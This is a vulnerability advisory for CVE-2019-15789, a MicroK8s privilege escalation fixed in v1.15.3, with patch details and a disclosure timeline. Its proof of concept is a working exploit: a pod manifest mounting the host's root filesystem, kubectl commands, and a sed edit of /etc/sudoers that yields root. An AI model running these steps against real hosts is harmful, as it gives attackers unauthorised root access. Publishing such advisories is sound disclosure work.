MicroK8s prior to v1.15.3 included a privilege escalation vulnerability, allowing a low privilege user to obtain root access to the host. MicroK8s allowed any user with access to the host to deploy a pod to the underlying Kubernetes installation. This allowed an attacker with local access to provision a privileged container and gain root access to the underlying host.
Date Released: 10/09/2019
Author: Denis Andzakovic
Project Website: https://microk8s.io/
Affected Software: MicroK8s <= v1.15.2
CVE: CVE-2019-15789
PROOF-OF-CONCEPT EXPLOIT
As low privileged users were allowed to configure the running cluster and containers therein, a malicious user could spawn a pod with complete access to the root file system, edit /etc/sudoers
and escalate to root.
doi@microk8:~$ cat pod.yaml
apiVersion: v1
kind: Pod
metadata:
name: hostmount
spec:
containers:
- name: shell
image: ubuntu:latest
command:
- "bin/bash"
- "-c"
- "sleep 10000"
volumeMounts:
- name: root
mountPath: /opt/root
volumes:
- name: root
hostPath:
path: /
type: Directory
doi@microk8:~$ microk8s.kubectl apply -f pod.yaml
pod/hostmount created
doi@microk8:~$ microk8s.kubectl exec -it hostmount /bin/bash
root@hostmount:/# cd /opt/
root@hostmount:/opt# cd root/
root@hostmount:/opt/root# ls
bin dev home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz
boot etc initrd.img lib lost+found mnt proc run snap swap.img tmp var vmlinuz.old
root@hostmount:/opt/root# cd etc/
root@hostmount:/opt/root/etc# sed -i 's/ALL$/NOPASSWD: ALL/g' sudoers
root@hostmount:/opt/root/etc# cat sudoers
{...snip...}
# User privilege specification
root ALL=(ALL:ALL) NOPASSWD: ALL
# Members of the admin group may gain root privileges
%admin ALL=(ALL) NOPASSWD: ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) NOPASSWD: ALL
{...snip...}
root@hostmount:/opt/root/etc# exit
exit
doi@microk8:~$ sudo su -
root@microk8:~# id
uid=0(root) gid=0(root) groups=0(root)
The above could also be trivially achieved with a privileged container, though MicroK8s disables privileged containers by default. Note: privileged containers are enabled when Istio is installed.
PATCH
The MicroK8s team addressed this vulnerability in v1.15.3 by requiring any access to the Kubernetes installation to be performed by a privileged user (eg, through sudo or by adding the user to the microk8s group).
TIMELINE
12/06/2019 – Advisory sent to Ubuntu security mailing list.
14/06/2019 – Advisory receipt acknowledged.
16/07/2019 – Update requested.
17/07/2019 – Report confirmed by the Ubuntu team.
15/08/2019 – Update requested.
15/08/2019 – Ubuntu referenced an open pull request, introducing the a requirement for all MicroK8s actions to be performed via sudo.
06/09/2019 – v1.15.3 snap added to stable.
10/09/2019 – Advisory released.